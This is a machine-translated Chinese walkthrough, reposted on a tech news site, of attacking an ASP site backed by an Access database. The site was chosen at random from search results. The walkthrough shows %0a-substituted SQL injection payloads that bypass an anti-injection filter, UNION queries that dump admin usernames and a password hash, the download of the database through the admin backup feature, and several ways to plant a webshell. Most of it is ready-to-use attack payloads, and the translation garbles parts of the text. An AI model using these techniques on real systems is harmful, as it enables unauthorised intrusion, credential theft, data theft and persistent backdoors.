Shulou(Shulou.com)06/01 Report--

Manual bypass of common code anti-injection system for Acesss database

By antian365 remnant Maple simeon

* the process is the reproduction process of various security technologies. This time, from the discovery of SQL injection points to the anti-injection of common code bypassing sql injection, it can be said to open a door to obtain administrator password and database through sql injection. If conditions permit, webshell can be obtained completely. The key technologies such as obtaining webshell from access database are also summarized in this paper.

1.1 get target information

Search for the keyword "news.asp?id=" through Baidu, randomly select a record in the search results, open it as shown in figure 1, test whether the website can be accessed normally, and use the F9 function key in Firefox to open hackbar.

Figure 1 testing the target site

1.2 Test for the existence of SQL injection

Randomly open a news link address http://www.xxxxx.com/news.asp?id=1172 in the http://www.xxxxx.com/ website and add and 1 = 2 and and 1 = 1 after its address to determine whether there is injection, as shown in figure 2. After clicking Execute, the page shows the existence of "SQL universal anti-injection system".

Figure 2 there is a universal anti-injection system for SQL

After the address of the website, add "- 0" and "/" to test, open "http://www.xxxxx.com/news.asp?id=1172/" browser to display the results as shown in figure 3, open" http://www.xxxxx.com/news.asp?id=1172-0" results as shown in figure 4, there is obvious SQL injection.

Figure 3 shows no content

Figure 4 shows the existence of content

1.3 Bypass SQL anti-injection system

1.post submission cannot be bypassed

Enter and 1 submission and and 1 submission 2 in Post data, check "Enable Post data", click "Execute" to test, as shown in figure 5, the result does not change, indicating that direct post submission can not be bypassed.

Figure 5 post submission cannot be bypassed

two。 Replace space bypass

Changed the POST way or not, friends said that using% 09 (that is, tab key) can be bypassed, after testing or not, as shown in figure 6, with% 0a (newline character) to replace the space successfully bypassed, as shown in figure 7.

Figure 6 cannot be bypassed

Figure 7 successful bypass

1.4 get database types and tables and fields

(1) determine the type of database

The type of database used by the website is judged by the error messages of and (selectcount (*) from sysobjects) > 0 and and (selectcount (*) from msysobjects) > 0. If the database is SQL-SERVE, then the first, the web page must be running normally, the second is abnormal; if ACCESS, then both will be abnormal. In POST, submit the following in turn:

And%0a (select%0acount (*)% 0afrom%0asysobjects) > 0

And%0a (select%0acount (*)% 0afrom%0amsysobjects) > 0

The results show that "there is no content yet!" The actual content should be the content of id=1158, and the result of the execution of both statements is an exception, indicating that it is an access database.

(2) judging column names by order by

Id=1172%0aorder%0aby%0a23 is normal.

Id=1172%0aorder%0aby%0a24 error

"Order by 23" is normal. 23 represents the number of column names queried.

(3) determine whether there is an admin table.

And (select count (*) from admin) > 0

And%0a (select%0acount (*)% 0afrom%0aadmin) > 0

(4) determine whether there are user and pass fields.

And (select count (username) fromadmin) > 0

And (select count (password) fromadmin) > 0

Transformed statement

And 0a (select%0acount (user) 0afrom%0aadmin) > 0

And%0a (select%0acount (pass) 0afrom%0aadmin) > 0

Test whether there are uid,id,uid errors in the admin table, as shown in figure 8, and the id is normal, as shown in figure 9.

Figure 8uid does not exist

Figure 9id exists

1.5 get the administrator password

Id=1158%0aUNION%0aSelect%0a1,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%0afrom%0aadmin, obtain the password "5ed9ff1d48e059b50db232f497b35b45" of the admin-dh user, as shown in figure 10. After logging in to the background, it is found that the user has lower privileges, so you also need to obtain the password of other administrator users to execute the statement:

Id=1158%0aUNION%0aSelect%0a1,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%0afrom%0aadmin%0awhere%0aid=1, get the user password with id 1, as shown in figure 11.

Figure 10 get the amdin-dh user password

Figure 11 get the administrator zzchxj user password

1.6. Get the database

(1) acquisition of information related to database backup

As shown in figure 12, there is a database backup feature in background management. In the backup page, there is the current database path, backup database directory, backup database name and other information.

Figure 12 Database backup

(2) obtain the real database name through the compression function

Click compress, as shown in figure 13, to get the real name and path of the database and other information such as ".. / data-2016/@@@xxxxx###.asp".

Figure 13 get the real path and name information of the database

(3) back up and obtain the database

Enter ".. / data-2016/@@@xxxxx###.asp" into the current database path, and back up the database name "db1.mdb". As shown in figure 14, the backup database is successful, and the database path you backed up is in the server space: d:\ virtualhost\ *\ www\ ahs*admin\ Databackup\ db1.mdb, and the database download address is:

Http://www.xxxxx.com/ahszhdzzcadmin/Databackup/db1.mdb

Figure 14 backup database

The method of getting webshell from 1.8access Database

(1) query export method

Create table cmd (a varchar (50))

Insert into cmd (a) values ('')

Select * into [a] in'c:\ wwwroot\ 1.asatrex.xls' 'excel 4.0' from cmd

Drop table cmd

Connect http://www.antian365.com/1.asa;x.xls directly to the kitchen knife.

(2) Database backup

Insert "┼" in places where you can write data content, such as messages, and get a backdoor password of a through database backup.

(3) acquisition of database image backup

Upload the picture with a sentence inserted at the back door to the website to obtain the specific address of the image, and then set the backup file to the specific location of the image file through backup. For example, specify / databacp/1.asp to obtain the webshell.

1.9 reference articles

(1) http://www.freebuf.com/articles/web/36683.html, common methods of SQL injection bypassing WAF

(2) http://www.cnblogs.com/joy-nick/p/5774462.html Magi SQL injection Bypass skills

(3) http://www.antian365.com/forum.php?mod=viewthread&tid=1084&extra=, complete AccessSQL injection reference

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.